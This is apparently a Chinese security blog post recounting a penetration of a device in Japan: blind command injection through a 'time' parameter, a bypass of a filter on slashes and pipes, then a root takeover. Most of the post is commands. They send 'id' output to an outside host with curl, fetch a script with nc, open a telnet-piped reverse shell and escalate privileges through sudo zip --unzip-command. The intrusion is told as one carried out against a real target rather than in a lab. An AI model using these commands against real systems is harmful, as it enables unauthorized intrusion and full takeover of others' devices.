查看原文
其他

一次有趣的RCEbypass

听风安全 2023-11-28

The following article is from ZAC安全 Author ZAC安全

免责声明由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------


一次有趣的RCEbypass

01

测试阶段

  文章首发于奇安信攻防社区:

   https://forum.butian.net/share/2551

  

  跟大哥一起渗透樱花国的时候发现个RCE

  无回显,使用curl进行测试

    大哥服务器上有个接受参数回显的脚本,启动并监听

    成功接收到该回显

time=`curl x.x.x.x -d"c=$(id)"`


    尝试写入测试,失败


    尝试远程下载wget,powershell上线等方式,均失败

    使用cat读取代码


    简单说下代码,接受post的time参数,将T替换成空格,将/替换成-,然后把过滤过的参数放进SystemSetting_setLocalTime函数当中

    跟进函数,接收参数后拼接到$cmd_date_set

    然后在48行中过滤掉|,然后拼接到exec中进行命令执行,其中|符号用不了,可以使用反引号``来代替拼接

    所以我们现在知道了屏蔽了/  | \三个符号

   梳理下思路,一般利用方式因为/的原因,所以用不了http协议,无法尝试远程下载等方式,没有权限进行写入文件,那么现在几种方式进行bypass,第一种,替换/|\符号,比如常见的空格符$IFS替换,第二种,进行提权写入文件,第三种,想办法再挖一个其他漏洞进行组合利用,第四种,尝试在其他目录写文件执行

    那么先查看有哪些命令可用

    使用compgen -c没有回显,echo $PATH只返回个H,最后使用busybox进行输出测试

    常用的思路到这卡住了,尝试使用进行读取某一个字符并输出到当前目录,但发现该方法也无效,没有生成成功output.txt

ddif=1bs=1skip=9count=1status=noneof=output.txt


    继续想办法,虽然限制了/不能进行cd ../..等,但是正常的cd ..是可以使用的

    使用命令

cd..;cd..;cd..;cd..;cdtmp;ncx.x.x.x81>1.sh

    发现是可以成功的


02

成功getshell

    经过测试,成功步骤如下

    以下简称服务端,其中被控端为目标设备

1 服务端启用nc监听,并在被控端中写入命令

    被控端:

cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 81 > 1.sh

    服务端:

sudo nc -lvvnp 85

2 服务端写命令

telnet x.x.x.x82|/bin/sh | telnet x.x.x.x83


    回车后打开burp

3 被控端写命令

time=`curl x.x.x.x -d"c=$(cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 85 > 1.sh)"`


4发包,发现成功写入1.sh

5 监听82,83端口

    并发包

time=`cd..;cd..;cd..;cd..;cdtmp;sh 1.sh`


6 至此成功拿到shell

7 进行提权

    其中/etc/sudoers 设置了nobody可以使用sudo不需要输入密码的命令

    又因为/usr/bin/zip 有一个参数--unzip-command可以执行命令

    所以使用以下命令就可以直接进行提权

sudo /usr/bin/zip1aca.zip/etc/passwd -T--unzip-command="sh -c /bin/sh"


    拿到root权限。

03

方法二

    第二种方法,根据文件代码,发现一个上传点如下

    其中路径为/svr/www,没有到网站目录/www/,那么利用方法就是上传一个文件,在使用rce进行执行拿到shell,在34行有个简单的判断是否为zip格式文件,但是并没有限制后缀名等条件

    简单写个poc

    其中写入的内容如下

sudo /usr/bin/zip1aca.zip/etc/syslog.conf -T--unzip-command="sh -c 'id > /tmp/test.txt'"


    上传成功后跟之前的利用思路一样,跨目录进行读取



圆满成功!感谢@昭通早行网络科技有限公司的各位师傅不吝赐教!!!

不可错过的往期推荐哦


Weblogic上传漏洞在不知绝对路径情况下拿shell方法

让后渗透中的Everything变得不再鸡肋

遇到的注入三例

实战之巧用验证码校验接口

U盘植马之基于arduino的badusb实现及思考

APT是如何杜绝软件包被篡改的

利用sqlserver agent job实现权限维持

SRC挖掘葵花宝典

点击下方名片,关注我们
觉得内容不错,就点下“”和“在看
如果不想错过新的内容推送可以设为星标
继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存